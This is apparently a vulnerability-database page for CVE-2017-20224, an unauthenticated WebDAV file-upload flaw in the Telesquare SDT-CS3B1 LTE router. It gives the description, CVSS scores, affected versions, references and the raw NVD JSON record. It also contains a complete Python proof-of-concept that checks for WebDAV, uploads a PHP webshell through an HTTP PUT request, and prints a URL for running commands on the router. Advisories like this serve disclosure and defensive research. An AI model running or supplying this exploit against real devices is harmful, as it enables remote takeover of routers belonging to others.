Security Vulnerability Report
CVE-2017-20224 CVSS 9.8 CRITICAL

CVE-2017-20224

Published: 2026-03-16 14:17:53
Last Modified: 2026-04-14 16:52:33

Description

Telesquare SKT LTE Router SDT-CS3B1 version 1.2.0 contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious content by exploiting enabled WebDAV HTTP methods. Attackers can use PUT, DELETE, MKCOL, MOVE, COPY, and PROPPATCH methods to upload executable code, delete files, or manipulate server content for remote code execution or denial of service.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.2.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:telesquare:sdt-cs3b1:-:*:*:*:*:*:*:* - NOT VULNERABLE
Telesquare SKT LTE Router SDT-CS3B1 < 1.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2017-20224 PoC - Telesquare SKT LTE Router SDT-CS3B1 Arbitrary File Upload
Target: Telesquare SKT LTE Router SDT-CS3B1 version 1.2.0
Vulnerability: WebDAV arbitrary file upload via PUT method
"""

import requests
import sys


def upload_shell(target_ip, target_port=80):
    """
    Upload a PHP webshell to the target router via WebDAV PUT method
    """
    # PHP webshell content
    webshell = b'<?php system($_GET["cmd"]); ?>'

    # Target URL with WebDAV enabled path
    url = f"http://{target_ip}:{target_port}/webdav/shell.php"

    # HTTP headers for WebDAV PUT request
    headers = {
        'Content-Type': 'application/octet-stream',
        'Destination': 'http://target/webdav/shell.php'
    }

    print(f"[*] Attempting to upload webshell to {url}")

    try:
        # Send PUT request to upload the webshell
        response = requests.put(url, data=webshell, headers=headers, timeout=10)

        if response.status_code in [201, 204]:
            print("[+] Webshell uploaded successfully!")
            print(f"[+] Access shell at: http://{target_ip}:{target_port}/webdav/shell.php?cmd=whoami")
            return True
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


def check_webdav(target_ip, target_port=80):
    """
    Check if WebDAV methods are enabled on the target
    """
    url = f"http://{target_ip}:{target_port}/"

    print(f"[*] Checking WebDAV support on {url}")

    # Check OPTIONS to see allowed methods
    try:
        response = requests.options(url, timeout=10)
        allowed_methods = response.headers.get('Allow', 'Not specified')
        print(f"[*] Allowed methods: {allowed_methods}")

        if 'PUT' in allowed_methods or 'PROPFIND' in allowed_methods:
            print("[+] WebDAV methods are enabled - target may be vulnerable")
            return True
        else:
            print("[-] WebDAV methods not detected")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Check failed: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        print(f"Example: {sys.argv[0]} 192.168.1.1 80")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80

    # First check if target is vulnerable
    if check_webdav(target, port):
        # Attempt to upload webshell
        upload_shell(target, port)
```

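References

https://cxsecurity.com/issue/WLB-2017120301 (Exploit, Issue Tracking)
https://www.vulncheck.com/advisories/telesquare-skt-lte-router-sdt-cs3b1-webdav-arbitrary-file-upload (Third Party Advisory)
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5446.php (Exploit, Third Party Advisory)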

Raw JSON Data

JSON
{"cve": {"id": "CVE-2017-20224", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:52.560", "lastModified": "2026-04-14T16:52:32.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Telesquare SKT LTE Router SDT-CS3B1 version 1.2.0 contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious content by exploiting enabled WebDAV HTTP methods. Attackers can use PUT, DELETE, MKCOL, MOVE, COPY, and PROPPATCH methods to upload executable code, delete files, or manipulate server content for remote code execution or denial of service."}, {"lang": "es", "value": "El router Telesquare SKT LTE SDT-CS3B1 versión 1.2.0 contiene una vulnerabilidad de carga arbitraria de archivos que permite a atacantes no autenticados cargar contenido malicioso explotando métodos HTTP WebDAV habilitados. Los atacantes pueden usar los métodos PUT, DELETE, MKCOL, MOVE, COPY y PROPPATCH para cargar código ejecutable, eliminar archivos o manipular el contenido del servidor para la ejecución remota de código o la denegación de servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", 
"modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "1CB1EF95-F220-467F-903C-0727F5250CF2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:telesquare:sdt-cs3b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "81DED0D5-BDBB-4310-BD2D-0F4ED27B274B"}]}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2017120301", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": 
"https://www.vulncheck.com/advisories/telesquare-skt-lte-router-sdt-cs3b1-webdav-arbitrary-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5446.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}